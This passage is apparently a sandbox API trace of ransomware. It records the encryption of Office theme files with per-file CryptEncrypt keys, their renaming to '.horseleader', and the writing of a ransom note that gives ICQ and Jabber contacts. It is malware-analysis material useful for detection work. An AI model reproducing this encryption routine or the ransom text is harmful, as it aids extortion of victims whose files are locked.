CloseHandle (hObject=0x1a4) returned 1 [0248.228] GetProcessHeap () returned 0x780000 [0248.228] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.228] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.horseleader") returned 89 [0248.229] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\preview.gif.horseleader")) returned 1 [0248.229] GetProcessHeap () returned 0x780000 [0248.229] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.230] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad387f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0xa5d5, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0248.230] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0248.230] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 78 [0248.230] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0248.230] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0248.230] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0248.230] lstrlenW (lpString=".testttjffg") returned 11 [0248.230] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0248.230] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.230] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.230] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.231] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG") returned 78 [0248.231] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0248.231] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=42453) returned 1 [0248.231] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.234] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.234] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.235] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.235] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.235] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.235] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5d5, lpOverlapped=0x0) returned 1 [0248.236] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffa2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.236] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5d5, lpOverlapped=0x0) returned 1 [0248.236] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.236] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.236] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.236] CloseHandle (hObject=0x1a4) returned 1 [0248.236] GetProcessHeap () returned 0x780000 [0248.237] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.237] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.horseleader") returned 90 [0248.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\thmbnail.png.horseleader")) returned 1 [0248.240] GetProcessHeap () returned 0x780000 [0248.240] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.240] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36a17500, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x5e574fb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x36a17500, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0x101cc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATER.ELM", cAlternateFileName="")) returned 1 [0248.240] lstrcmpiW (lpString1="WATER.ELM", lpString2="Windows") returned -1 [0248.240] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM") returned 75 [0248.240] StrStrIW (lpFirst="WATER.ELM", lpSrch=".horseleader") returned 0x0 [0248.240] lstrcmpW (lpString1="WATER.ELM", lpString2="#Decrypt#.txt") returned 1 [0248.240] lstrcmpW (lpString1="WATER.ELM", lpString2="_uninstalling_.png") returned 1 [0248.240] lstrlenW (lpString=".testttjffg") returned 11 [0248.240] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM", lpSrch=".testttjffg") returned 0x0 [0248.241] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.241] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.241] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM") returned 75 [0248.242] StrStrW (lpFirst="WATER.ELM", lpSrch=".txt") returned 0x0 [0248.242] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=65996) returned 1 [0248.242] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.243] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.245] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.245] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.246] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x58e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.246] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.246] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.247] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.247] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb1cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.247] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.247] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.247] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0248.248] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.248] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.248] CloseHandle (hObject=0x1a4) returned 1 [0248.248] GetProcessHeap () returned 0x780000 [0248.248] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.248] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM.horseleader") returned 87 [0248.248] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.elm.horseleader")) returned 1 [0248.249] GetProcessHeap () returned 0x780000 [0248.249] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.249] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1a1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATER.INF", cAlternateFileName="")) returned 1 [0248.249] lstrcmpiW (lpString1="WATER.INF", lpString2="Windows") returned -1 [0248.249] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF") returned 75 [0248.249] StrStrIW (lpFirst="WATER.INF", lpSrch=".horseleader") returned 0x0 [0248.249] lstrcmpW (lpString1="WATER.INF", lpString2="#Decrypt#.txt") returned 1 [0248.250] lstrcmpW (lpString1="WATER.INF", lpString2="_uninstalling_.png") returned 1 [0248.250] lstrlenW (lpString=".testttjffg") returned 11 [0248.250] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF", lpSrch=".testttjffg") returned 0x0 [0248.250] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0248.250] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0248.250] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0248.251] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF") returned 75 [0248.251] StrStrW (lpFirst="WATER.INF", lpSrch=".txt") returned 0x0 [0248.251] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=417) returned 1 [0248.252] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1a1, lpOverlapped=0x0) returned 1 [0248.253] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffe5f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0248.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1a1, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1a1, lpOverlapped=0x0) returned 1 [0248.253] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0248.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0248.253] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0248.253] CloseHandle (hObject=0x1a4) returned 1 [0248.254] GetProcessHeap () returned 0x780000 [0248.254] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dc820 [0248.254] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF.horseleader") returned 87 [0248.254] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.inf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\WATER.INF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\water.inf.horseleader")) returned 1 [0248.255] GetProcessHeap () returned 0x780000 [0248.255] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0248.255] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x389cfa00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x389cfa00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x1a1, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="WATER.INF", cAlternateFileName="")) returned 0 [0248.255] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0248.255] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\#Decrypt#.txt") returned 79 [0248.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATER\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\water\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0248.256] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0248.256] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0248.257] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0248.257] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0248.257] CloseHandle (hObject=0x158) returned 1 [0248.257] GetProcessHeap () returned 0x780000 [0248.257] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dbfd8 | out: hHeap=0x780000) returned 1 [0248.257] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WATERMAR", cAlternateFileName="")) returned 1 [0248.257] lstrcmpiW (lpString1="WATERMAR", lpString2="Windows") returned -1 [0248.257] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR") returned 68 [0248.257] lstrcmpW (lpString1="WATERMAR", lpString2=".") returned 1 [0248.257] lstrcmpW (lpString1="WATERMAR", lpString2="..") returned 1 [0248.257] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0248.258] GetProcessHeap () returned 0x780000 [0248.258] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dbfd8 [0248.258] wnsprintfW (in: pszDest=0x7dbfd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\*") returned 70 [0248.258] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\WATERMAR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a71ef90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7084efd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7084efd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0248.258] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0248.258] wnsprintfW 